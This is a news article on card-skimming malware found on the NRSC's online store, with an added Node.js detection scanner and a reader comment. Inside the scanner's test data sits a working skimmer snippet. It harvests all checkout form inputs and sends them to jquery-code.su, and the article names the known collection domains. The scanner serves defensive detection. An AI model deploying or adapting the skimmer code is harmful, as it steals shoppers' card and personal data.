Have you plastered a #NeverHillary sticker onto your refrigerator? One you picked up in the past 6 months from an online store run by Senate Republicans?
If so, your credit card details, along with those of your fellow Republican supporters, may have been skimmed.
From there they were sent to a server in Russia and, in all likelihood, sold on. Black-market prices for a stolen card run from $4 to $120; the security researcher who found the skimmer assumes a modest $30 a pop.
That researcher is Willem de Groot, co-founder of the Dutch e-commerce company Byte. On 4 October, he posted about discovering that the online store for the National Republican Senatorial Committee (NRSC) had been rigged with card-skimming malware.
The store sells pro-Republican t-shirts, stickers and baseball caps.
For 6 months, between 16 March and 5 October, the malware was running in the background as visitors entered items into their online carts.
The card-skimming code watched for clues that a payment page had loaded, such as the word "checkout". Once it saw them, it collected everything entered on the order form, including the buyer's name and address, credit card number and the merchandise ordered.
Then it sent all of that to a collection server in Russia.
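The behaviour just described (key on "checkout", harvest the form, post the fields to an outside host) is what a store operator would want to scan for. The following is an added example, not code from the article or from de Groot: a small Node.js indicator scanner that pulls the script references and inline script bodies out of a page and flags either the two collection domains named later in this article (jquery-cloud.net, jquery-code.su) or a script that shows all three behavioural markers plus a host other than the store's own. The sample pages in the block are constructed for the example, not captured from store.nrsc.org, and the skimmer sketch in them is illustrative, not the malware that was on the site.

```javascript
// Added example (not the article's or de Groot's code). Scans a page's HTML
// for the skimmer pattern the article describes. Sample pages are constructed.

const KNOWN_EXFIL_DOMAINS = ['jquery-cloud.net', 'jquery-code.su'];

// Heuristic markers. All three must match, plus a foreign host, before an
// inline script is reported, so ordinary checkout-page analytics stay quiet.
const CHECKOUT_TRIGGER = /location[\s\S]{0,80}checkout/i;
const FORM_HARVEST = /(input|form)[\s\S]{0,200}(serialize|\.value\b)/i;
const EXFIL_CALL = /new\s+Image\s*\(\s*\)|XMLHttpRequest|\bfetch\s*\(/i;

// Pull out <script src="..."> references and inline script bodies.
function extractScripts(html) {
  const inline = [];
  const external = [];
  const tag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    if (src) external.push(src[1]);
    else if (m[2].trim()) inline.push(m[2]);
  }
  return { inline, external };
}

// Resolve a (possibly relative) URL against the store and return its hostname.
function hostOf(url, storeHost) {
  try {
    return new URL(url, 'https://' + storeHost + '/').hostname.toLowerCase();
  } catch (e) {
    return '';
  }
}

function isKnownExfilHost(host) {
  return KNOWN_EXFIL_DOMAINS.some(d => host === d || host.endsWith('.' + d));
}

// Returns a list of findings, each {type, detail}; an empty list means clean.
function scanPage(html, storeHost) {
  const findings = [];
  const { inline, external } = extractScripts(html);

  for (const src of external) {
    if (isKnownExfilHost(hostOf(src, storeHost))) {
      findings.push({ type: 'known-exfil-domain', detail: src });
    }
  }

  for (const code of inline) {
    const urls = code.match(/https?:\/\/[^\s"'<>]+/gi) || [];
    const hosts = urls.map(u => hostOf(u, storeHost)).filter(Boolean);
    const known = hosts.filter(isKnownExfilHost);
    if (known.length) {
      findings.push({ type: 'known-exfil-domain', detail: known.join(',') });
    }
    const foreign = hosts.filter(h => h !== storeHost);
    if (foreign.length && CHECKOUT_TRIGGER.test(code) &&
        FORM_HARVEST.test(code) && EXFIL_CALL.test(code)) {
      findings.push({ type: 'skimmer-behaviour', detail: foreign.join(',') });
    }
  }
  return findings;
}

// Constructed sample: an ordinary checkout page with page-view analytics.
const BENIGN_PAGE = `
<script src="/js/jquery.min.js"></script>
<script>
if (location.pathname.indexOf('checkout') > -1) { ga('send', 'pageview'); }
</script>`;

// Constructed sample: the same page plus a script that behaves as the article
// describes. An illustrative sketch only, not the malware from the store.
const SKIMMED_PAGE = BENIGN_PAGE + `
<script>
if (location.href.indexOf('checkout') > -1) {
  document.forms[0].onsubmit = function () {
    var fields = document.getElementsByTagName('input'), data = '';
    for (var i = 0; i < fields.length; i++) data += fields[i].name + '=' + fields[i].value + '&';
    new Image().src = 'https://jquery-code.su/collect.php?' + encodeURIComponent(data);
  };
}
</script>`;

console.log(JSON.stringify(scanPage(BENIGN_PAGE, 'store.nrsc.org')));   // []
console.log(JSON.stringify(scanPage(SKIMMED_PAGE, 'store.nrsc.org')));
```

The domain list catches this particular campaign; the behavioural rule is what catches the next one, and it deliberately requires all three markers and an outside host, since a legitimate checkout page will often test for "checkout" in the location on its own. Run it against the HTML served on the store's checkout page, not the template in the repository: the whole point of the NRSC case is that the injected code lived on the live site for months.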
Here’s a video demonstrating how the attack worked:
Two days after de Groot posted his findings, the NRSC took down the site and told Reuters that yes, it had been hit by a “skimming operation”.
NRSC spokeswoman Andrea Bozek told the news outlet that a vendor discovered “an issue yesterday that affected an extremely small number of supporters.”
De Groot found that the malware had been in place for some time: at least since 16 March.
The NRSC said that the affected transactions account for less than 0.0018 percent of online donations to the NRSC, and that it had found no evidence its primary donation system was compromised.
From a statement the NRSC sent to Reuters:
The problem was fixed immediately and we are contacting those who were affected.
The news went largely unnoticed until CSO’s Salted Hash reported the story on Monday.
When you hear of cyberattacks on a national US political party and Russia in the same breath, what springs to mind are the attacks on the Democratic National Committee (DNC).
In July, just days before the Democratic Convention, WikiLeaks released nearly 20,000 emails that it said came from the accounts of DNC officials.
Related incidents have included the intrusion into the email account of Hillary Clinton's presidential campaign chairman, John Podesta, and the hijacking of his Twitter account.
What’s more, US politicians have accused Russian hackers of trying to sway US elections.
But according to a follow-up analysis de Groot published last Tuesday, the NRSC store wasn't specifically targeted at all.
Rather, it’s just one of thousands of online stores that he’s found compromised.
Many have been fixed, but more are still being skimmed, he says.
Beyond online stores, we’ve seen credit card skimming malware rigged up at gas stations, hotel chains, ATMs, and fast-food chains.
As for the sites receiving the card details, de Groot found two Russian credit card harvesters: jquery-cloud.net in March and, more recently, jquery-code.su in October.
Both domains are hosted by a company called Dataflow, which has a Russian language website but was registered last year in Belize.
De Groot says that Dataflow is a small network, but it’s a nasty one. Other things that run on the network span all the unsavoury flavors of online fraud: money launderers, synthetic drug traders, darknet messaging, phishers and spammers.
De Groot says he doesn't know how many credit cards were stolen. To estimate the crooks' take, he made an educated guess from the store's traffic, which he looked up on TrafficEstimate.
That site estimates that store.nrsc.org has been getting around 350K visits per month of late, so de Groot figures it this way:
A conservative conversion ratio of 1% yields 3500 stolen credit cards per month, or 21K stolen credit cards since March. Black market value per card is between $4 and $120, so I assume a modest $30 per card. The villains could have made roughly $600K on this store alone.
And that’s just how much the card skimmers might have sold the stolen details for, he points out.
Who knows how much the crooks who bought those cards may have racked up in fraudulent charges?
It’s a good idea to keep an eye on your credit card statements, regardless of your political affiliation. But if you’re a Republican who shops at the NRSC, keep two eagle eyes out.
Bryan
The NRSC's site resolves to 104.20.23.33, which doesn't match the Dataflow range of 80.87.204.0-80.87.205.255.
Have they switched hosting?